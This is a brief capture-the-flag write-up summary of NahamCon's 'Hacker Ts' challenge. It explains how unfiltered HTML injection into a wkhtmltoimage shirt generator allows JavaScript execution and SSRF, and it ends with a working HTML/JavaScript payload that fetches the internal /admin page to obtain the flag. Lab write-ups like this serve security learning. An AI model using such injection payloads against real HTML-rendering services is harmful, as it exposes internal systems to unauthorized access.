Rating:
Hacker Ts was a hard-rated challenge featuring a simple webapp that used wkhtmltoimage to make a custom "hacker shirt" image. The website is doing no filtering, allowing for HTML injection and by extension, arbitrary JS execution. We then leverage this to get SSRF on the `/admin` directory and get the flag. See the full writeup [here](https://an00brektn.github.io/nahamcon-hacker-ts/).
Final payload:
```html
<div id='stuff'>a</div>
<script>
x = new XMLHttpRequest();
x.open('GET','http://localhost:5000/admin',false);
x.send();
document.getElementById('stuff').innerHTML= x.responseText;
</script>
```